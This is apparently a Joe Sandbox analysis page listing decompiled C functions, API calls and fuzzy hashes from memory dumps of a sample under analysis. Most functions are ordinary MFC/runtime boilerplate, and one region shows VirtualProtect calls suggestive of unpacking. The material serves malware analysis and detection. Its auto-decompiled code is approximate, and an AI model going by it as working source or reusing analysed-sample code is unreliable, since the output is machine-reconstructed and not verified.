Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 4b2985310e55d01a51c35c94c145e98cb6cf6508d3b3b950bf57967042e4943f
Instruction ID: 1cc108b070ddcadaf49700f58f1fb47de74f4529278b4a49e0f23a097ff97351
Opcode Fuzzy Hash: 4b2985310e55d01a51c35c94c145e98cb6cf6508d3b3b950bf57967042e4943f
Instruction Fuzzy Hash: 00F062372012119BD7112BB65CC897BB6A8AFC5692705427AF905F2392DB389C05817D

Uniqueness

Uniqueness Score: -1.00%

Function 004064EE, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004064EE() {
				intOrPtr _t16;
				struct HWND__* _t19;
				intOrPtr _t23;
				intOrPtr* _t28;
				void* _t29;

				_t28 =  *((intOrPtr*)(_t29 - 0x20));
				_t23 =  *((intOrPtr*)(_t29 - 0x24));
				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
					E0040CA8B(_t23, 1);
				}
				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
					EnableWindow( *(_t29 - 0x14), 1);
				}
				if( *(_t29 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
						SetActiveWindow( *(_t29 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E00405F01(_t23, _t28, 0, _t28, _t34);
				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
					FreeResource( *(_t29 - 0x18));
				}
				_t16 =  *((intOrPtr*)(_t28 + 0x44));
				return E0041F7C2(_t16);
			}

APIs

EnableWindow.USER32(?,00000001), ref: 0040650E
GetActiveWindow.USER32 ref: 00406519
SetActiveWindow.USER32(?,?,00000024,00401257,00000000,Local AppWizard-Generated Applications), ref: 00406527
FreeResource.KERNEL32(?,?,00000024,00401257,00000000,Local AppWizard-Generated Applications), ref: 00406543

Part of subcall function 0040CA8B: EnableWindow.USER32(?,?), ref: 0040CA98

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Window$ActiveEnable$FreeResource
String ID:
API String ID: 253586258-0
Opcode ID: 2876d6dea77e8e8b7ec39ccd4b15d906bf4c1806271e33c20b36b9320a52a774
Instruction ID: 4853af9af119085c85b499c513028b08372eaae9968efb4a3fc4ab9602832ae4
Opcode Fuzzy Hash: 2876d6dea77e8e8b7ec39ccd4b15d906bf4c1806271e33c20b36b9320a52a774
Instruction Fuzzy Hash: 55F04F30A00605DBCF21AF64DC455AEBBB1BF88705B55113AE503722E5C73A6D90CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0041CE14, Relevance: 6.0, APIs: 4, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0041CE14(intOrPtr _a4, intOrPtr _a8) {
				long _t4;
				long _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t13;

				_t14 = _a4;
				if(_a4 == 0) {
					__eflags =  *0x446820;
					if( *0x446820 == 0) {
						_t5 = GetTickCount();
						 *0x446820 =  *0x446820 + 1;
						__eflags =  *0x446820;
						 *0x4433d8 = _t5;
					}
					_t4 = GetTickCount() -  *0x4433d8;
					__eflags = _t4 - 0xea60;
					if(_t4 > 0xea60) {
						__imp__CoFreeUnusedLibraries();
						_t4 = GetTickCount();
						 *0x4433d8 = _t4;
					}
					return _t4;
				}
				return E0041CDBD(_t7, _t8, _t9, _t13, _t14, _a8);
			}

APIs

GetTickCount.KERNEL32 ref: 0041CE36
GetTickCount.KERNEL32 ref: 0041CE43
CoFreeUnusedLibraries.OLE32 ref: 0041CE52
GetTickCount.KERNEL32 ref: 0041CE58

Part of subcall function 0041CDBD: CoFreeUnusedLibraries.OLE32(00000000,0041CE9C,00000000), ref: 0041CE01
Part of subcall function 0041CDBD: OleUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0041CE9C), ref: 0041CE07

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CountTick$FreeLibrariesUnused$Uninitialize
String ID:
API String ID: 685759847-0
Opcode ID: 5235b46726404d5874cca75f6cc8b7585f8e2c9bb584c9876188f54316066500
Instruction ID: 38eb2e71dc98f28b912332c2f41d7ff22c59e4d9a07145cfe7d16bad1c32e9e8
Opcode Fuzzy Hash: 5235b46726404d5874cca75f6cc8b7585f8e2c9bb584c9876188f54316066500
Instruction Fuzzy Hash: 54E0E538944324ABD750BF24EC8879A7BA0AB4AB41F114837D44096274CB7879C1CE9E

Uniqueness

Uniqueness Score: -1.00%

Function 004169C9, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E004169C9(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t106;
				signed int _t118;
				intOrPtr* _t122;
				signed int _t138;
				signed int _t146;
				void* _t149;
				signed int _t150;
				signed int _t174;
				signed int _t176;
				void* _t177;
				void* _t182;
				signed int _t184;
				void* _t185;
				void* _t187;

				_t186 = __ecx;
				_t146 = 0;
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					__eflags =  *(__ecx + 0x40);
					if( *(__ecx + 0x40) == 0) {
						L9:
						_t149 = 0;
						__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
						 *(_t186 + 0x38) = _t146;
						if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
							L12:
							_t103 =  *(_t186 + 0x38);
							__eflags = _t103 - _t146;
							if(__eflags > 0) {
								_t176 = 0x30;
								_t172 = _t103 * _t176 >> 0x20;
								_t167 =  ~(__eflags > 0) | _t103 * _t176;
								 *((intOrPtr*)(_t186 + 0x3c)) = E00402EE1( ~(__eflags > 0) | _t103 * _t176, _t167);
							}
							__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
							_v12 = _t146;
							_v16 = _t146;
							if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
								L21:
								_t150 =  *(_t186 + 0x38);
								_t104 =  *((intOrPtr*)(_t186 + 8));
								 *((intOrPtr*)( *_t104 + 0x10))(_t104, _t150,  *((intOrPtr*)(_t186 + 0x3c)), _t150 << 4, _t146);
								_t106 =  *(_t186 + 0x38);
								__eflags = _t106 - _t146;
								if(__eflags != 0) {
									_t174 = 0x10;
									_t156 =  ~(__eflags > 0) | _t106 * _t174;
									 *(_t186 + 0x40) = E00402EE1( ~(__eflags > 0) | _t106 * _t174, _t156);
								}
								__eflags =  *(_t186 + 0x38) - _t146;
								if( *(_t186 + 0x38) <= _t146) {
									L26:
									E00416138(_t186);
									return  *((intOrPtr*)( *_t186 + 0x10))();
								} else {
									_t182 = 0;
									__eflags = 0;
									do {
										E0041F330(_t182,  *(_t186 + 0x40) + _t182, 0, 0x10);
										 *(_t182 +  *(_t186 + 0x40)) =  *(_t182 +  *(_t186 + 0x40)) & 0x00000000;
										_t187 = _t187 + 0xc;
										_t146 = _t146 + 1;
										_t182 = _t182 + 0x10;
										__eflags = _t146 -  *(_t186 + 0x38);
									} while (_t146 <  *(_t186 + 0x38));
									goto L26;
								}
							} else {
								_v8 = _t146;
								do {
									_t118 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x14)) + _v8 + 0x24)) + 4));
									__eflags = _t118 - _t146;
									_v20 = _t118;
									if(_t118 == _t146) {
										goto L20;
									}
									_t184 = _v12 * 0x30;
									__eflags = _t184;
									do {
										_t122 = E00406B97( &_v20);
										E00413D5B(_t172,  *((intOrPtr*)(_t186 + 0x3c)) + _t184,  *((intOrPtr*)(_t186 + 0x14)) + _v8);
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x18) = _v12 << 4;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) & 0x00000000;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) | 0xffffffff;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) | 0xffffffff;
										_v12 = _v12 + 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x28)) = 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x2c)) =  *((intOrPtr*)( *_t122 + 0xa0));
										_t184 = _t184 + 0x30;
										__eflags = _v20;
									} while (_v20 != 0);
									_t146 = 0;
									__eflags = 0;
									L20:
									_v16 = _v16 + 1;
									_v8 = _v8 + 0x28;
									__eflags = _v16 -  *((intOrPtr*)(_t186 + 0x10));
								} while (_v16 <  *((intOrPtr*)(_t186 + 0x10)));
								goto L21;
							}
						}
						_t138 =  *((intOrPtr*)(_t186 + 0x14)) + 0x24;
						__eflags = _t138;
						do {
							_t177 =  *_t138;
							_t172 =  *(_t177 + 0xc);
							 *(_t186 + 0x38) =  *(_t186 + 0x38) +  *(_t177 + 0xc);
							_t149 = _t149 + 1;
							_t138 = _t138 + 0x28;
							__eflags = _t149 -  *((intOrPtr*)(_t186 + 0x10));
						} while (_t149 <  *((intOrPtr*)(_t186 + 0x10)));
						goto L12;
					}
					_t185 = 0;
					__eflags =  *(__ecx + 0x38);
					if( *(__ecx + 0x38) <= 0) {
						L8:
						 *(_t186 + 0x40) = _t146;
						goto L9;
					}
					_v12 = 0;
					do {
						__imp__#9( *(__ecx + 0x40) + _v12);
						_v12 = _v12 + 0x10;
						_t185 = _t185 + 1;
						__eflags = _t185 -  *(__ecx + 0x38);
					} while (_t185 <  *(__ecx + 0x38));
					__eflags =  *(__ecx + 0x38);
					if(__eflags > 0) {
						_push( *(__ecx + 0x40));
						E00402F0C(0, _t185, __ecx, __eflags);
						_push( *((intOrPtr*)(_t186 + 0x3c)));
						E00402F0C(0, _t185, _t186, __eflags);
					}
					goto L8;
				}
				E00416138(__ecx);
				return  *((intOrPtr*)( *__ecx + 0x10))();
			}

APIs

VariantClear.OLEAUT32(?), ref: 00416A02

Strings

(, xrefs: 00416B12

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: ClearVariant
String ID: (
API String ID: 1473721057-3887548279
Opcode ID: 9e245cdb4b1b3db07f8c097b9736297f1d35a6d1de3b859328f47831a016493d
Instruction ID: e2f1c9d16809879ff49900d9c467e20496c9c06d17cdb03baeed69f06c4bbff3
Opcode Fuzzy Hash: 9e245cdb4b1b3db07f8c097b9736297f1d35a6d1de3b859328f47831a016493d
Instruction Fuzzy Hash: EC517871A007019FCB64CF69CA819AAB7F1FF48314B514A2EE58397A91C774F881CB48

Uniqueness

Uniqueness Score: -1.00%

Function 004146F5, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E004146F5(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				signed int _v4;
				void* _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v56;
				char _v60;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				short _v84;
				signed int _v88;
				signed int _v92;
				short _v96;
				short _v100;
				signed int _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				intOrPtr _v120;
				char _v124;
				signed int* _t79;
				void* _t90;
				intOrPtr _t97;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				signed int _t120;
				signed int _t128;
				signed int _t131;
				intOrPtr _t132;
				void* _t155;

				_t153 = __edi;
				_push(0x70);
				E0041F6EA(E00432D8F, __ebx, __edi, __esi);
				_t155 = __ecx;
				_t79 =  *(__ecx + 0x50);
				_t128 = 0;
				_t131 = 0 | _t79 != 0x00000000;
				if(_t131 != 0) {
					_push( &_v16);
					_push(0x439440);
					_v16 = 0;
					_t131 =  *_t79;
					_push(_t79);
					_v20 = 0;
					if( *_t131() < 0) {
						L19:
						return E0041F7C2(_v20);
					} else {
						if((0 | _v16 != 0x00000000) == 0) {
							goto L4;
						} else {
							_v120 = __ecx + 0xc8;
							_v112 = __ecx + 0xd8;
							_v108 = __ecx + 0xdc;
							_v124 = 0x40;
							_v116 = 0;
							_v88 = 0;
							_v76 = 0;
							_v72 = 0;
							E0041A7E4( &_v36);
							_t97 =  *((intOrPtr*)(__ecx + 0x20));
							_v4 = 0;
							if(_t97 == 0) {
								goto L4;
							} else {
								_t153 =  *((intOrPtr*)(_t97 + 0x20));
								_v104 = 0;
								if(_t153 == 0) {
									goto L4;
								} else {
									do {
										_t31 = _t128 + 0x4369f8; // 0xfffffd3b
										 *((intOrPtr*)( *_t153 + 0x104))(_t155,  *_t31,  &_v36);
										if(_v28 != 0) {
											_t34 = _t128 + 0x4369fc; // 0x4
											_v104 = _v104 |  *_t34;
										}
										_t128 = _t128 + 8;
									} while (_t128 < 0x40);
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd40,  &_v36);
									_v100 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd43,  &_v36);
									_v96 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd34,  &_v36);
									_v84 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd3f,  &_v36);
									_v80 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd41,  &_v36);
									_t114 = _v28;
									_push( &_v92);
									_push(0x439490);
									_push(_t114);
									if( *((intOrPtr*)( *_t114))() < 0) {
										_v92 = _v92 & 0x00000000;
									}
									_t116 = _v16;
									_push( &_v60);
									_push( &_v124);
									_v60 = 0x18;
									_push(_t116);
									if( *((intOrPtr*)( *_t116 + 0xc))() >= 0) {
										 *((intOrPtr*)(_t155 + 0x70)) = _v56;
										 *((intOrPtr*)(_t155 + 0x60)) = _v48;
										 *((intOrPtr*)(_t155 + 0x64)) = _v44;
										_v20 = 1;
									}
									_t118 = _v16;
									 *((intOrPtr*)( *_t118 + 8))(_t118);
									_t120 = _v92;
									if(_t120 != 0) {
										 *((intOrPtr*)( *_t120 + 8))(_t120);
									}
									__imp__#9( &_v36);
									goto L19;
								}
							}
						}
					}
				} else {
					L4:
					_push(_t131);
					_t4 =  &_v24; // 0x4423e8
					_v24 = 0x442480;
					E0041F7F4(_t4, 0x43c590);
					asm("int3");
					_push(4);
					E0041F6EA(E00431BFC, _t128, _t153, _t155);
					_t132 = E0040F014(0x104);
					_v36 = _t132;
					_t90 = 0;
					_v24 = 0;
					if(_t132 != 0) {
						_t90 = E0040D519(_t132);
					}
					return E0041F7C2(_t90);
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 004146FC

Strings

@, xrefs: 0041475F

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: H_prolog3
String ID: @
API String ID: 431132790-2766056989
Opcode ID: efa78f53c0518dc018037837d0fade7883eb2ca6750ca131b4e709d9f413c559
Instruction ID: 551150b91cef73a53ffa5b2b1fed6b209468a552cb216a3673e312414697938b
Opcode Fuzzy Hash: efa78f53c0518dc018037837d0fade7883eb2ca6750ca131b4e709d9f413c559
Instruction Fuzzy Hash: 7651E8B0E0020A9FDB14CFA5C884AEEB7F9BF48304F14456EE516EB290E779A945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00402B10, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00402B10(void* __ebx, intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr* _v56;
				intOrPtr* _t66;
				void* _t73;

				_t73 = __ebx;
				_v56 = __ecx;
				if(_a8 != 0) {
					if(_a4 == 0) {
						E00401040(0x80070057);
					}
					_v32 =  *((intOrPtr*)( *_v56 - 0xc));
					_v8 = _v32;
					_v36 =  *_v56;
					_v12 = _a4 - _v36;
					_v48 =  *_v56 - 0x10;
					_v40 = 1 -  *((intOrPtr*)(_v48 + 0xc));
					_v44 =  *((intOrPtr*)(_v48 + 8)) - _a8;
					if((_v40 | _v44) < 0) {
						E00402CE0(_v56, _a8);
					}
					_v52 =  *_v56;
					_v16 = _v52;
					if(_v12 > _v8) {
						E0041F3AA(_t73, _a8, _v16, _a8, _a4, _a8);
					} else {
						E0041F425(_v16, _a8, _v16 + _v12, _a8);
					}
					if(_a8 < 0 || _a8 >  *((intOrPtr*)( *_v56 - 8))) {
						E00401040(0x80070057);
					}
					 *((intOrPtr*)( *_v56 - 0xc)) = _a8;
					_t66 = _v56;
					 *((char*)( *_t66 + _a8)) = 0;
					return _t66;
				}
				return E00402C20(_v56);
			}

APIs

_memmove_s.LIBCMT ref: 00402BC0

Strings

~hW, xrefs: 00402BF3

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: _memmove_s
String ID: ~hW
API String ID: 800865076-4279806109
Opcode ID: 931fb6340859c89c402a8088c38bd7c54ab9a0b71192c09071587e71d5b65f94
Instruction ID: 102a0ea3eca27aeed369f946151bd1db1440c8230f948bad12f4f6323d19a1f9
Opcode Fuzzy Hash: 931fb6340859c89c402a8088c38bd7c54ab9a0b71192c09071587e71d5b65f94
Instruction Fuzzy Hash: 7B41E578A01108EFCB04DF99D58499EB7B2FF88310F20C15AE919AB395C735AE41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0041C01D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0041C01D(void* __ecx) {
				signed short* _t33;
				void* _t35;
				void* _t40;
				void* _t43;
				signed short _t46;
				intOrPtr _t47;
				void* _t48;
				signed short _t50;
				signed int _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t55;

				_t48 = __ecx;
				_t54 =  *((intOrPtr*)(_t55 + 0x14));
				_t53 = 0;
				if( *((intOrPtr*)(_t54 + 8)) > 0) {
					_t47 =  *((intOrPtr*)(_t55 - 0x1c));
					do {
						__imp__#9(_t47);
						_t53 = _t53 + 1;
						_t47 = _t47 + 0x10;
					} while (_t53 <  *((intOrPtr*)(_t54 + 8)));
				}
				E0041F7F4(0, 0);
				E0041B9A1(_t48);
				_t33 =  *(_t55 + 0x10);
				if(_t33 == 0) {
					_t35 = ( *(_t55 - 0x24) & 0x0000ffff) - 8;
					if(_t35 == 0) {
						__imp__#6(_t46);
					} else {
						_t40 = _t35 - 1;
						if(_t40 == 0) {
							L19:
							if(_t46 != 0) {
								 *((intOrPtr*)( *_t46 + 8))(_t46);
							}
						} else {
							_t43 = _t40 - 3;
							if(_t43 == 0) {
								__imp__#9(_t55 - 0x44);
							} else {
								if(_t43 == 1) {
									goto L19;
								}
							}
						}
					}
				} else {
					_t50 =  *(_t55 - 0x24);
					 *_t33 = _t50;
					_t52 = (_t50 & 0x0000ffff) + 0xfffffffe;
					if(_t52 <= 0x13) {
						switch( *((intOrPtr*)(_t52 * 4 +  &M0041C107))) {
							case 0:
								L12:
								 *(__eax + 8) = __bx;
								goto L23;
							case 1:
								 *(__eax + 8) = __ebx;
								goto L23;
							case 2:
								 *(__eax + 8) =  *(__ebp - 0x44);
								goto L23;
							case 3:
								 *(__eax + 8) =  *(__ebp - 0x44);
								goto L23;
							case 4:
								__ecx =  *(__ebp - 0x44);
								 *(__eax + 8) =  *(__ebp - 0x44);
								__ecx =  *(__ebp - 0x40);
								 *(__eax + 0xc) = __ecx;
								goto L23;
							case 5:
								__bx =  ~__bx;
								asm("sbb ebx, ebx");
								goto L12;
							case 6:
								__esi = __ebp - 0x44;
								__edi = __eax;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								goto L23;
							case 7:
								goto L23;
							case 8:
								_t33[4] = _t46;
								goto L23;
						}
					}
				}
				L23:
				 *(_t55 - 4) = 0;
				E0041B9F7(_t55 - 0x58);
				 *(_t55 - 4) =  *(_t55 - 4) | 0xffffffff;
				if( *((intOrPtr*)(_t55 - 0x2c)) != 0) {
					_push( *((intOrPtr*)(_t55 - 0x30)));
					_push(0);
					E0040D3B7();
				}
				return E0041F7E5(_t46, _t53, _t54);
			}

APIs

VariantClear.OLEAUT32(?), ref: 0041C02B
__CxxThrowException@8.LIBCMT ref: 0041C03E

Strings

XpC, xrefs: 0041C0D8

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: ClearException@8ThrowVariant
String ID: XpC
API String ID: 3645285410-1560596422
Opcode ID: c6d49d499b5d8eaa98cd637276b1d5e44ea3e0b00cd18839773f064d833eb071
Instruction ID: d9f4d4b0c6ef5e2124660a129b9ddfcdd11f384d2037844c7c04da0540221948
Opcode Fuzzy Hash: c6d49d499b5d8eaa98cd637276b1d5e44ea3e0b00cd18839773f064d833eb071
Instruction Fuzzy Hash: 08218E30984208CFCB10DFE5CCC46EDBBB1FF49310F25815AD55A272A1C7396A8ADB5A

Uniqueness

Uniqueness Score: -1.00%

Function 022E2430, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 022E2468
VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 022E24B2

Strings

@, xrefs: 022E2453

Memory Dump Source

Source File: 00000003.00000002.615064004.00000000022E1000.00000020.00000001.sdmp, Offset: 022E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22e1000_dot3hc.jbxd

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: b0ed06b0904b7b5d349e43da5bb46151d78503066fe4eb38dd6de6c737d05048
Instruction ID: 92ed9fdc69547ca25d068f88ee40974eb0216de1eed6941f7a5aa98db7ce6d50
Opcode Fuzzy Hash: b0ed06b0904b7b5d349e43da5bb46151d78503066fe4eb38dd6de6c737d05048
Instruction Fuzzy Hash: 5721C6B0A10209EBDF14CFD4C984BAEBBB9BF44304F548699D90BAB245C774AA40EB55

Uniqueness

Uniqueness Score: -1.00%

Function 00404429, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00404429(void* __ecx) {
				signed int _v8;
				char _v16;
				char _v18;
				char _v280;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				long _t14;
				intOrPtr _t15;
				char* _t18;
				intOrPtr _t21;
				intOrPtr _t33;
				signed int _t36;

				_t11 =  *0x443590; // 0x8ffedb05
				_v8 = _t11 ^ _t36;
				_t35 = 0x104;
				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
				if(_t14 == 0 || _t14 == 0x104) {
					L4:
					_t15 = 0;
					__eflags = 0;
				} else {
					_t18 = PathFindExtensionA( &_v280);
					_t35 = "%s.dll";
					asm("movsd");
					asm("movsw");
					_t32 =  &_v280;
					_t41 = _t18 -  &_v280 + 7 - 0x106;
					asm("movsb");
					_t33 = _t33;
					if(_t18 -  &_v280 + 7 > 0x106) {
						goto L4;
					} else {
						E00403EBB(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
						_t15 = E00404142(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
					}
				}
				return E0041E5DF(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
			}

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0040444F
PathFindExtensionA.SHLWAPI(?), ref: 00404465

Part of subcall function 00403EBB: _strcpy_s.LIBCMT ref: 00403EC7

Part of subcall function 00404142: __EH_prolog3.LIBCMT ref: 00404161
Part of subcall function 00404142: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 00404182
Part of subcall function 00404142: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00404193
Part of subcall function 00404142: ConvertDefaultLocale.KERNELBASE(?), ref: 004041C9
Part of subcall function 00404142: ConvertDefaultLocale.KERNELBASE(?), ref: 004041D1
Part of subcall function 00404142: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 004041E5
Part of subcall function 00404142: ConvertDefaultLocale.KERNEL32(?), ref: 00404209
Part of subcall function 00404142: ConvertDefaultLocale.KERNEL32(000003FF), ref: 0040420F
Part of subcall function 00404142: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00404248

Strings

%s.dll, xrefs: 0040446B

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
String ID: %s.dll
API String ID: 3444012488-3668843792
